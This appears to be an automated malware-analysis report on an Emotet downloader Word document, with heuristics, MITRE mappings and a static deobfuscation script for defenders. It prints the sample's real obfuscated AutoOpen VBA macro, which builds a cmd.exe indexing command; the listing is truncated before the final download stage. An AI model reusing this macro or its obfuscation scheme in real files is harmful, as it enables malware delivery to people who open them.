Verdict: MALICIOUS (risk score 142)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
ClamAV identifies the sample with the signature Doc.Downloader.Emotet-6884099-0. Several heuristics flag an AutoOpen VBA macro, so the code runs as soon as the document is opened with macros enabled. The macro pads itself with meaningless `TypeName` calls and assembles a command line from short string fragments, never-assigned variables (Empty in VBA, so they concatenate as nothing and count as 0 in arithmetic) and `Chr(... + 34 + ...)` for the quote characters. The recovered fragments begin `cmd /V/C"set C9Ea=<alphabet>` followed by `for %m in (30;22;48;47;1;59;51;...)`: `/V` enables delayed environment-variable expansion and each number indexes one character of the `set` string, the batch-layer obfuscation characteristic of Emotet maldocs and consistent with the ClamAV family name. The extracted source is truncated, so the decoded second-stage command (the download-and-execute stage the "Downloader" signature name implies) is not shown in this report.
Heuristics (5)

- ClamAV: Doc.Downloader.Emotet-6884099-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware with signature Doc.Downloader.Emotet-6884099-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): the document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): an AutoOpen macro is present and runs automatically when the document is opened with macros enabled.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this heuristic only indicates old Word macro execution surface, not a downloader or a parser-CVE attribution. Here a full VBA project was in fact recovered (see Extracted artifacts), so the finding adds nothing beyond the AutoOpen detection above.
- Embedded URL (info, EMBEDDED_URL): one URL was extracted from the document body (OLE text): http://schemas.openxmlformats.org/drawingml/2006/main. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. This particular URL is the standard DrawingML XML namespace present in any Office document with drawing content and is not an indicator of compromise.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5578 bytes | 32e49c06190bd4c021f8937768d590e102361374fcf95d44aae4811df071dedd |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "vAwEVtIbVSrSj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName CLng(irMhWn)
TypeName 338329765
TypeName aYiCM
TypeName 71
TypeName CBool(489)
TypeName MmzEcE
Shell@ CStr("c") + CStr("m") + NdZfvViX + uKofsGwlEwon + MWsbmbqR + znhucOiUT + kCQUKdtB + IbfiCAfuwqT + oPotQiWZjdTJ, 755278706 - 755278706
TypeName Cos(jfTHB - 96777)
TypeName Int(uNzPl)
End Sub
Attribute VB_Name = "vFsjRPNQrNrzD"
Function MWsbmbqR()
On Error Resume Next
TypeName 439636158
TypeName 285005702
cSatoFJq = "d /V/C" + CStr(Chr(NdizaPl + luHIVFzTNF + 34 + MjKTdrkTP + bSCThDWQ)) + "se" + "t" + " C" + "9" + "Ea=KrbJdJP" + "bdjHWnEXP" + "Q" + "OJi" + "KB" + "oPnDJjOIp" + "mG/M$aF v" + "C+S=,{" + ";ew"
TypeName ChrB(383582473)
TypeName Hex(8792)
EEQRNoXkOJS = ".:h" + "9u}" + "Nyfl" + "sq" + "xR5Lc" + "gz" + "1-(t4'V\k)"
TypeName CByte(5)
TypeName 143
cCVNZBTcM = "@&&for %m" + " in (30;2" + "2;48;47;1;" + "5" + "9;51;4" + "7;58;58;38" + ";35;5" + "1;51;60;4" + "3;24;47;" + "48;69" + ";22;7;" + "27;47;65" + ";71;38;55;"
TypeName wpIFpR
TypeName CbjKf
ptFQILNao = "47" + ";71;49" + ";11;47;7;4" + "0;58;19" + ";47;24" + ";71;" + "46;35;3" + "7" + ";22;3" + "6;43;73"
TypeName Chr(245)
TypeName Sgn(7)
dcbMzR = ";51;71;7" + "1;" + "30;5" + "0;" + "33;" + "3" + "3;71;24;5" + "7;1" + "9;"
TypeName ChrB(8316)
TypeName tFWYT
OMDocnwcb = "1;59;71" + ";49;65" + ";2" + "2" + ";" + "3"
TypeName QwqdQn
TypeName 430906566
jwifwAHlQqF = "1;33;" + "30;14;64;7" + "8;51;" + "71" + ";71;3" + "0;50;33;" + "33;" + "7" + "1;51;47" + ";" + "71;1;47" + ";47"
TypeName Log(36468 / uJHbE - qjQrz / OQZNj)
TypeName BMmqE
waGduUCzb = ";31;22;3" + "9;19;4" + "7" + ";49;6" + "5;22;31;33" + ";63;3" + "0;" + "71;" + "48;62;34;7" + "4;"
TypeName CDbl(MASwG * QJjwuU + SjwOt / haDDH)
TypeName Chr(352)
fXQwMfkN = "60;78;51;" + "71;" + "71;30;50;" + "33;33;48;" + "48" + ";48;4" + "9" + ";59;" + "53;24;8;36" + ";56;30"
TypeName 6
TypeName Fix(TCCrp)
TypeName Log(68150 * srHzGq / liBjd - 77025)
hAQDhRXGWcs = ";58;36;24;" + "24;19;" + "2" + "4;66;" + "49;" + "65;22;31;" + "33;22;10;7" + "6;34;78;51" + ";71;7" + "1" + ";30;50;3" + "3;" + "33;71;"
TypeName Sin(1)
TypeName Oct(pIwLiB)
TypeName Log(CQwrc / nzBWC)
zzQuiXw = "47;76;76" + ";5" + "6;49;24" + ";4" + "7;7" + "1;33;66" + ";51;67;5" + "5;28;78;5" + "1;71;71;3" + "0;" + "50;3" + "3;"
TypeName Hex(856)
TypeName Int(oVlDh / TrrnN / 655 / 42173)
TypeName Hex(72852 / 27956 - 81033 + hDZSt)
jVSiZwz = "33;" + "71;4" + "7;65;58" + ";47;48" + ";47;7;49;" + "65;22;31;4" + "9;7;" + "1" + ";3" + "3;57"
TypeName dmFIOt
TypeName Sgn(217608389)
TypeName CInt(pswBr)
ZciRUjDa = ";3" + "2;11;5" + "2;72;22" + ";19" + ";" + "65;73" + ";49" + ";42;30;5" + "8;19;71;70" + ";73;7" + "8;73;77;"
MWsbmbqR = cSatoFJq + EEQRNoXkOJS + cCVNZBTcM + ptFQILNao + dcbMzR + OMDocnwcb + jwifwAHlQqF + waGduUCzb + fXQwMfkN + hAQDhRXGWcs + zzQuiXw + jVSiZwz + ZciRUjDa
TypeName Hex(Zlujmj)
TypeName Fix(EOYRM)
TypeName CStr(14389 / dCPnV)
End Function
Function znhucOiUT()
On Error Resume Next
TypeName Rnd(biwWrW - 81357 * 40956 + 2877)
TypeName CLng(79437 - FiQXwv * 70717 + FHmNNY)
ivULw = "46;35;2" + "1" + ";67;20;3" + "8;43;3" + "8;73" + ";68;63;63"
TypeName Fix(lUGMu)
TypeName mUfut
TypeName Rnd(94)
fFXswVSz = ";73;46;" + "35" + ";62;65;" + "5" + "3;43;" + "35;47;24" + ";39" + ";" + "50;71" + ";47" + ";31;3" + "0;41;73"
TypeName Sin(18)
TypeName Rnd(3285)
TypeName CDate(UGdJon)
WwWhCbp = ";" + "75;73" + ";" + "41;3" + "5;21;" + "67;20;41;7" + "3;" + "49;47" + ";61;47;73;"
TypeName aDJTsw
TypeName 713
TypeName Log(iITGsT / 29262 - JwLniE - biiLV)
iZMdUwiw = "46;57;" + "22;" + "1;47;36" + ";6" + "5;5" + "1;70;35;4" + "2;42;"
TypeName bWNco
... (truncated)
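The two obfuscation layers visible in the preview above (VBA string-fragment concatenation padded with junk `TypeName` calls, then a cmd.exe `set`/`for %m in (...)` indexer under `/V` delayed expansion) can be unpicked statically, without running the macro. The following Python is an added example, not code from this report, from the analyzer, or from the sample: it replays the assignments of one junk-padded VBA function to rebuild the string it returns, then decodes the batch indexer by selecting one alphabet character per index. The VBA input, the alphabet `oplwersh`, the index list and the names `kQpZ`, `aAa`, `bBb`, `cCc`, `Qz` and `r` are all constructed for the example; nothing here is taken from the truncated sample.

```python
import re
from typing import Dict, Optional

# Constructed VBA in the shape of the page's MWsbmbqR / znhucOiUT functions:
# junk `TypeName` statements, string literals split into fragments, and Chr()
# applied to never-assigned names (VBA treats them as Empty: 0 in arithmetic,
# "" in concatenation). Alphabet and index list are made up for this example.
SAMPLE_VBA = r'''Function kQpZ()
On Error Resume Next
TypeName 439636158
aAa = "d /V/C" + CStr(Chr(xYz + 34 + qRs)) + "se" + "t" + " Qz=" + "oplw"
TypeName Hex(8792)
bBb = "ersh" + CStr(Chr(uVw + 34)) + "&&for %m in (1;0;3;" + "4;5;6;"
TypeName Chr(245)
cCc = "7;4;2;2) do set r=!r!!Qz:~%m,1!"
kQpZ = aAa + bBb + cCc
End Function
'''

# Prefix the page's AutoOpen puts in front of the function results: CStr("c") + CStr("m").
AUTOOPEN_PREFIX = "cm"

JUNK = ("TypeName", "On Error", "Function", "End Function", "Attribute")


def _num(expr: str) -> int:
    """Evaluate a VBA `+` sum whose terms are integers or never-assigned names (Empty -> 0)."""
    return sum(int(t) if t.isdigit() else 0 for t in (p.strip() for p in expr.split("+")))


def _eval(expr: str, env: Dict[str, str]) -> str:
    """Evaluate a `+` concatenation of "literals", Chr()/CStr() calls and variables.
    Other calls (Hex, Cos, ...) only occur in junk statements and yield ""."""
    out, i, n = [], 0, len(expr)
    while i < n:
        c = expr[i]
        if c == '"':                                    # string literal ("" escapes not handled)
            j = expr.index('"', i + 1)
            out.append(expr[i + 1:j])
            i = j + 1
        elif c.isalpha() or c == "_":                   # identifier or call
            j = i
            while j < n and (expr[j].isalnum() or expr[j] == "_"):
                j += 1
            name = expr[i:j]
            if j < n and expr[j] == "(":                # balanced-parenthesis argument
                depth, k = 0, j
                while True:
                    depth += {"(": 1, ")": -1}.get(expr[k], 0)
                    k += 1
                    if depth == 0:
                        break
                inner = expr[j + 1:k - 1]
                if name == "Chr":
                    out.append(chr(_num(inner)))
                elif name == "CStr":
                    out.append(_eval(inner, env))
                i = k
            else:
                out.append(env.get(name, ""))           # unassigned variable -> Empty -> ""
                i = j
        else:                                           # '+' and whitespace
            i += 1
    return "".join(out)


def rebuild_function(vba: str) -> str:
    """Return the string a junk-padded VBA function returns, by replaying its assignments."""
    m = re.search(r"^\s*Function\s+(\w+)", vba, re.M)
    if not m:
        raise ValueError("no Function header")
    env: Dict[str, str] = {}
    for line in vba.splitlines():
        line = line.strip()
        if not line or line.startswith(JUNK) or "=" not in line:
            continue
        lhs, _, rhs = line.partition("=")               # the first '=' is the assignment
        env[lhs.strip()] = _eval(rhs.strip(), env)
    return env.get(m.group(1), "")


def decode_for_indexer(cmdline: str) -> Optional[str]:
    """Emulate `set X=<alphabet>` followed by `for %m in (i;i;...) do set Y=!Y!!X:~%m,1!`:
    under /V delayed expansion each index selects one alphabet character; an
    out-of-range index yields nothing, as cmd's substring syntax does."""
    alpha = re.search(r'set\s+(\w+)=([^"&]*)', cmdline)  # alphabet may contain ';' '=' ','
    idx = re.search(r"for\s+%\w+\s+in\s+\(([\d;]+)\)", cmdline)
    if not alpha or not idx:
        return None
    alphabet = alpha.group(2)
    return "".join(alphabet[int(i)] if int(i) < len(alphabet) else ""
                   for i in idx.group(1).split(";") if i)


def analyse(vba: str = SAMPLE_VBA) -> Dict[str, Optional[str]]:
    cmdline = AUTOOPEN_PREFIX + rebuild_function(vba)
    return {"cmdline": cmdline, "decoded": decode_for_indexer(cmdline)}


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```

To apply this to the real sample, run `rebuild_function` over each of the functions named in the `Shell@` argument (`NdZfvViX`, `uKofsGwlEwon`, `MWsbmbqR`, `znhucOiUT`, ...) and join the results in that order behind the `"c" + "m"` prefix; the alphabet regex deliberately stops only at `"` or `&` because the sample's `set C9Ea=` string itself contains `;`, `=` and `,`. The decoder emulates the batch layer, not cmd.exe, so anything the decoded string goes on to do (typically a further interpreter invocation) still has to be read, not executed.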